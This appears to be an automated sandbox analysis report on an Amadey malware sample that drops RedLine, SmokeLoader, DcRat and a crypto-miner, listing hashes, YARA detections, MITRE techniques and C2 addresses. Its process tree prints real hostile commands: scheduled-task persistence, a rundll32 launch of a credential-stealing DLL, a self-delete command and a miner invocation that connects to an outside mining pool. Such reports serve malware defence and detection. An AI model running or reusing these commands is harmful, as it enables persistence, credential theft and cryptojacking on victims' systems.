amadey | 3e33cba3607467b99b975f6b69b90dfa3d63fc670e8449f37dd7c3356ec39fd3

Analysis

max time kernel
149s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
01/11/2022, 11:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
Size

320KB
MD5

d4fae7a6d40bfaced3456d116c06636b
SHA1

08be33fe4ef5d9600b401b8d188da09236fe6ad8
SHA256

3e33cba3607467b99b975f6b69b90dfa3d63fc670e8449f37dd7c3356ec39fd3
SHA512

38788407eb16e8583099a0ba82c90e9c02fff037aba46b5fd381db87c7ed74a3625b27fd5e57fafa93c4ad08a7499706656630d45e47c7724762d79ce04ed471
SSDEEP

3072:XE1wAS2i/i5li6Y+VcuOuNMxCnFSe2KdVDAiFJRgO0VggjcGkNIVqIV7:uwAS2iapYacuO+QaJrDR3RXw7ITsq

Score

10^/10

amadey dcrat redline smokeloader google2 slovarik15btc backdoor collection infostealer rat spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

slovarik15btc

78.153.144.3:2510

Attributes

auth_value
bfedad55292538ad3edd07ac95ad8952

Extracted

Family

redline

Botnet

Google2

167.235.71.14:20469

Attributes

auth_value
fb274d9691235ba015830da570a13578

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Amadey credential stealer module 4 IoCs

resource	yara_rule
behavioral2/files/0x000300000000071f-271.dat	amadey_cred_module
behavioral2/files/0x000300000000071f-273.dat	amadey_cred_module
behavioral2/memory/2788-274-0x0000000000730000-0x0000000000754000-memory.dmp	amadey_cred_module
behavioral2/files/0x000300000000071f-272.dat	amadey_cred_module

Detects Smokeloader packer 1 IoCs

resource	yara_rule
behavioral2/memory/4772-133-0x00000000001F0000-0x00000000001F9000-memory.dmp	family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral2/memory/4716-141-0x0000000000412000-0x0000000000433000-memory.dmp	family_redline
behavioral2/memory/4716-142-0x0000000000410000-0x0000000000438000-memory.dmp	family_redline
behavioral2/memory/4328-168-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
58	2788	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
4940	D21A.exe
3200	E564.exe
2656	E91E.exe
3588	EBB0.exe
2268	sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe
2032	F8E0.exe
1032	A46.exe
1136	LYKAA.exe
1992	rovwer.exe
3632	rovwer.exe
1532	rovwer.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000022e39-183.dat	upx
behavioral2/files/0x0007000000022e39-182.dat	upx
behavioral2/memory/2032-188-0x0000000000750000-0x0000000000F39000-memory.dmp	upx
behavioral2/memory/2032-190-0x0000000000750000-0x0000000000F39000-memory.dmp	upx

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	EBB0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	LYKAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	A46.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	rovwer.exe

Loads dropped DLL 5 IoCs

pid	Process
4884	InstallUtil.exe
4884	InstallUtil.exe
4884	InstallUtil.exe
2788	rundll32.exe
2788	rundll32.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4940 set thread context of 4716	4940	D21A.exe	89
PID 3200 set thread context of 4884	3200	E564.exe	95
PID 2656 set thread context of 4328	2656	E91E.exe	96
PID 1136 set thread context of 4164	1136	LYKAA.exe	126

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2524	1032	WerFault.exe	104
1252	3632	WerFault.exe	123

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2208	schtasks.exe
3620	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2260	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4772	3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
4772	3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3008	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
4772	3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	2268	sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	4328	vbc.exe
Token: SeDebugPrivilege	4716	vbc.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	1136	LYKAA.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 4940	3008	Process not Found	87
PID 3008 wrote to memory of 4940	3008	Process not Found	87
PID 3008 wrote to memory of 4940	3008	Process not Found	87
PID 4940 wrote to memory of 4716	4940	D21A.exe	89
PID 4940 wrote to memory of 4716	4940	D21A.exe	89
PID 4940 wrote to memory of 4716	4940	D21A.exe	89
PID 4940 wrote to memory of 4716	4940	D21A.exe	89
PID 4940 wrote to memory of 4716	4940	D21A.exe	89
PID 3008 wrote to memory of 3200	3008	Process not Found	91
PID 3008 wrote to memory of 3200	3008	Process not Found	91
PID 3008 wrote to memory of 3200	3008	Process not Found	91
PID 3008 wrote to memory of 2656	3008	Process not Found	92
PID 3008 wrote to memory of 2656	3008	Process not Found	92
PID 3008 wrote to memory of 2656	3008	Process not Found	92
PID 3008 wrote to memory of 3588	3008	Process not Found	94
PID 3008 wrote to memory of 3588	3008	Process not Found	94
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 3200 wrote to memory of 4884	3200	E564.exe	95
PID 2656 wrote to memory of 4328	2656	E91E.exe	96
PID 2656 wrote to memory of 4328	2656	E91E.exe	96
PID 2656 wrote to memory of 4328	2656	E91E.exe	96
PID 2656 wrote to memory of 4328	2656	E91E.exe	96
PID 2656 wrote to memory of 4328	2656	E91E.exe	96
PID 3588 wrote to memory of 2268	3588	EBB0.exe	97
PID 3588 wrote to memory of 2268	3588	EBB0.exe	97
PID 3008 wrote to memory of 2032	3008	Process not Found	98
PID 3008 wrote to memory of 2032	3008	Process not Found	98
PID 2268 wrote to memory of 2196	2268	sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe	99
PID 2268 wrote to memory of 2196	2268	sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe	99
PID 2196 wrote to memory of 2260	2196	cmd.exe	101
PID 2196 wrote to memory of 2260	2196	cmd.exe	101
PID 2032 wrote to memory of 3536	2032	F8E0.exe	102
PID 2032 wrote to memory of 3536	2032	F8E0.exe	102
PID 3008 wrote to memory of 1032	3008	Process not Found	104
PID 3008 wrote to memory of 1032	3008	Process not Found	104
PID 3008 wrote to memory of 1032	3008	Process not Found	104
PID 3008 wrote to memory of 2584	3008	Process not Found	105
PID 3008 wrote to memory of 2584	3008	Process not Found	105
PID 3008 wrote to memory of 2584	3008	Process not Found	105
PID 3008 wrote to memory of 2584	3008	Process not Found	105
PID 3008 wrote to memory of 4804	3008	Process not Found	106
PID 3008 wrote to memory of 4804	3008	Process not Found	106
PID 3008 wrote to memory of 4804	3008	Process not Found	106
PID 2196 wrote to memory of 1136	2196	cmd.exe	107
PID 2196 wrote to memory of 1136	2196	cmd.exe	107
PID 3008 wrote to memory of 4700	3008	Process not Found	108
PID 3008 wrote to memory of 4700	3008	Process not Found	108
PID 3008 wrote to memory of 4700	3008	Process not Found	108
PID 3008 wrote to memory of 4700	3008	Process not Found	108
PID 1136 wrote to memory of 3412	1136	LYKAA.exe	109
PID 1136 wrote to memory of 3412	1136	LYKAA.exe	109
PID 3412 wrote to memory of 2208	3412	cmd.exe	111
PID 3412 wrote to memory of 2208	3412	cmd.exe	111
PID 3008 wrote to memory of 2188	3008	Process not Found	112
PID 3008 wrote to memory of 2188	3008	Process not Found	112
PID 3008 wrote to memory of 2188	3008	Process not Found	112
PID 1032 wrote to memory of 1992	1032	A46.exe	113
PID 1032 wrote to memory of 1992	1032	A46.exe	113

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe
"C:\Users\Admin\AppData\Local\Temp\3e33cba3607467b99b975f6b69b90dfa3d63fc670e844.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4772

C:\Users\Admin\AppData\Local\Temp\D21A.exe
C:\Users\Admin\AppData\Local\Temp\D21A.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4716

C:\Users\Admin\AppData\Local\Temp\E564.exe
C:\Users\Admin\AppData\Local\Temp\E564.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3200
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  2⤵
  - Loads dropped DLL
  PID:4884

C:\Users\Admin\AppData\Local\Temp\E91E.exe
C:\Users\Admin\AppData\Local\Temp\E91E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4328

C:\Users\Admin\AppData\Local\Temp\EBB0.exe
C:\Users\Admin\AppData\Local\Temp\EBB0.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3588
- C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe
  "C:\Users\Admin\AppData\Roaming\sSeHUCuHsBSBcKeEcBeUHbHSCsEaUkBhCFKshABHcshBEBHUFEKsBUU.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp697.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2260
  - - C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
      "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1136
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3412
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:2208
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6
        5⤵
        
        PID:4164
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:1072

C:\Users\Admin\AppData\Local\Temp\F8E0.exe
C:\Users\Admin\AppData\Local\Temp\F8E0.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\system32\cmd.exe
  cmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\F8E0.exe"
  2⤵
  PID:3536

C:\Users\Admin\AppData\Local\Temp\A46.exe
C:\Users\Admin\AppData\Local\Temp\A46.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
  "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  PID:1992
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3620
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Accesses Microsoft Outlook profiles
    - outlook_win_path
    PID:2788
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 1244
  2⤵
  - Program crash
  PID:2524

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2584

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4804

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4700

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1032 -ip 1032
1⤵
PID:2932

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3336

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4724

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1552

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4964

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
1⤵
- Executes dropped EXE
PID:3632
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 420
  2⤵
  - Program crash
  PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3632 -ip 3632
1⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
1⤵
- Executes dropped EXE
PID:1532

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
837KB

MD5
9796f845b710c1e68ee9f93592503665

SHA1
9be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51

SHA256
2c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f

SHA512
c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
837KB

MD5
9796f845b710c1e68ee9f93592503665

SHA1
9be7d53dfa928f3a4ff37146a0ec1ef9a62c3c51

SHA256
2c0d646f8dbe3bc19c6d85ba819af553d68a1d4ce61a3e9f843566d35f240d8f

SHA512
c5f0f2fba732f9ba484e0ee0d672f488c1f7c454f1b549e348dea86f96e5bc706e8e634bb1cdab3f52d16af9ac8bb29505bf5905d47386b04a5905dc6b5e5135

Download Submit
C:\Users\Admin\AppData\LocalLow\mozglue.dll

Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
C:\Users\Admin\AppData\LocalLow\nss3.dll

Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
C:\Users\Admin\AppData\LocalLow\sqlite3.dll

Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

Filesize
2KB

MD5
8730644b84be7e133ab21f97a43c0117

SHA1
ac45ce1b256bed8f94a55153c5acdf1c6438b72d

SHA256
9562509765e4b604537ad94da94dfb7a675bc481e39ac98df0e245fa50a87169

SHA512
d9f1a3479e4e362a7343213b2baaf4911b071effc066d3d8c07157116334f10f856823f937a1d768857af5186b826d4de2d7075a5e6a17fffaead7740348bf49

Download Submit
C:\Users\Admin\AppData\Local\Temp\A46.exe

Filesize
359KB

MD5
2d71178035cc220c79f00a8fdd2df64b

SHA1
fb289a0637c798844126c4ee726f013b9b971270

SHA256
58036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11

SHA512
4d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\A46.exe

Filesize
359KB

MD5
2d71178035cc220c79f00a8fdd2df64b

SHA1
fb289a0637c798844126c4ee726f013b9b971270

SHA256
58036312cd69c237f26fc2145ccf0b9bcda123708b66f820eb7c137ab4361b11

SHA512
4d7d991d7dac4dab52eb06de85d706f18f752e2b495cae20fb4b1c9c23f9244c2a486ee41589cce1e1876334590ca6d8d8b044eef3cf0d2c64e8b2cb48a0fcaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\D21A.exe

Filesize
366KB

MD5
287572edc287d01d1e625d3b93efa326

SHA1
1ed75fcfe9a37ba94ab8c59bf5048b1a85932857

SHA256
b6c62694edd72c240d022a7a33276ee091fa986437f571c50a34fd67c9b44e45

SHA512
02994440785ec5347fd4f0895d674456f360ef43bc2ed96502cce72210600ff0af912ce169d66716893ccdb1a6894d2a7c2c6715b0652178fbb0535962e170e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\D21A.exe

Filesize
366KB

MD5
287572edc287d01d1e625d3b93efa326

SHA1
1ed75fcfe9a37ba94ab8c59bf5048b1a85932857

SHA256
b6c62694edd72c240d022a7a33276ee091fa986437f571c50a34fd67c9b44e45

SHA512
02994440785ec5347fd4f0895d674456f360ef43bc2ed96502cce72210600ff0af912ce169d66716893ccdb1a6894d2a7c2c6715b0652178fbb0535962e170e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\E564.exe

Filesize
1.2MB

MD5
b67545f8f9bcc95c2efca01d65d4c429

SHA1
062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf

SHA256
5c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4

SHA512
4ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563

Download Submit
C:\Users\Admin\AppData\Local\Temp\E564.exe

Filesize
1.2MB

MD5
b67545f8f9bcc95c2efca01d65d4c429

SHA1
062c213d68a70dfdaef4bc9828fbfd8ec0e0dbaf

SHA256
5c5b2716906f6be939574770f2ce1822dd3d4874dc1924a82096bccc377afde4

SHA512
4ca32731de173cc6a71f5b76ec94b98d340e3186f52719bdc7ed79849c5b2c4d5b2952c33e20716ce9af35d50d0e962521904a4a8d977e182dc3aabfdfa3d563

Download Submit
C:\Users\Admin\AppData\Local\Temp\E91E.exe

Filesize
366KB

MD5
b6f73df0d1c7d5fef86b5f3034767901

SHA1
0bc4f94c5100cbfae5c520ca7b541c3c86d528f3

SHA256
82a405a195eb3815d8a5ead1c6271cb279f7dbc11abebb7129b59561ad36e4b2

SHA512
196c7c0321c6f35f9222d278fa226c9a5b28d5bdb22636be1a365db3f18d37c12371dff9881324244bd284cc764e257744b1d134860ce4485d4b3c8dc74b5f8a

Download Submit
